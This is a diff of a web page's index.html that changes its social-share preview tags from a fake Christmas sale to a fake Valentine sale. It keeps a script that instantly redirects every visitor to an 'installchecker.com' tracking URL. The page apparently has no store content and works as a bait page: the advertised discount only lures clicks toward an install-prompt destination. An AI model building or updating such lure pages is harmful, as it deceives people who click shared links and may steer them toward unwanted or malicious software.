--- a/index.html
+++ b/index.html
@@ -6,18 +6,18 @@
   <meta name="description" content="Redirecting to your destination. Stay tuned!">
 
   <!-- Open Graph Meta Tags -->
-  <meta property="og:title" content="Christmas Sale - Up to 50% Off!">
-  <meta property="og:description" content="Don't miss out on amazing Christmas deals. Shop now and save big!">
-  <meta property="og:image" content="https://st2.depositphotos.com/3262945/9227/v/950/depositphotos_92273670-stock-illustration-christmas-sale-50.jpg">
+  <meta property="og:title" content="Valentine Sale - Up to 50% Off!">
+  <meta property="og:description" content="Don't miss out on amazing Valentine deals. Shop now and save big!">
+  <meta property="og:image" content="https://pngtree.com/freepng/valentines-day-sale-50-off-typography-with-heart-vector_19745723.html">
   <meta property="og:url" content="https://www.christmascelebration.online">
   <meta property="og:type" content="website">
 
   <!-- Twitter Card Meta Tags -->
   <meta name="twitter:card" content="summary_large_image">
-  <meta name="twitter:title" content="Christmas Sale - Up to 50% Off!">
-  <meta name="twitter:description" content="Don't miss out on amazing Christmas deals. Shop now and save big!">
-  <meta name="twitter:image" content="https://st2.depositphotos.com/3262945/9227/v/950/depositphotos_92273670-stock-illustration-christmas-sale-50.jpg">
-  <title>Get 50% On Christmas Items</title>
+  <meta name="twitter:title" content="Valentine Sale - Up to 50% Off!">
+  <meta name="twitter:description" content="Don't miss out on amazing Valentine deals. Shop now and save big!">
+  <meta name="twitter:image" content="https://pngtree.com/freepng/valentines-day-sale-50-off-typography-with-heart-vector_19745723.html">
+  <title>Get 50% On Valentine Items</title>
     <script>
 window.location.href="https://installchecker.com/cl/i/42n311" ;
 </script>
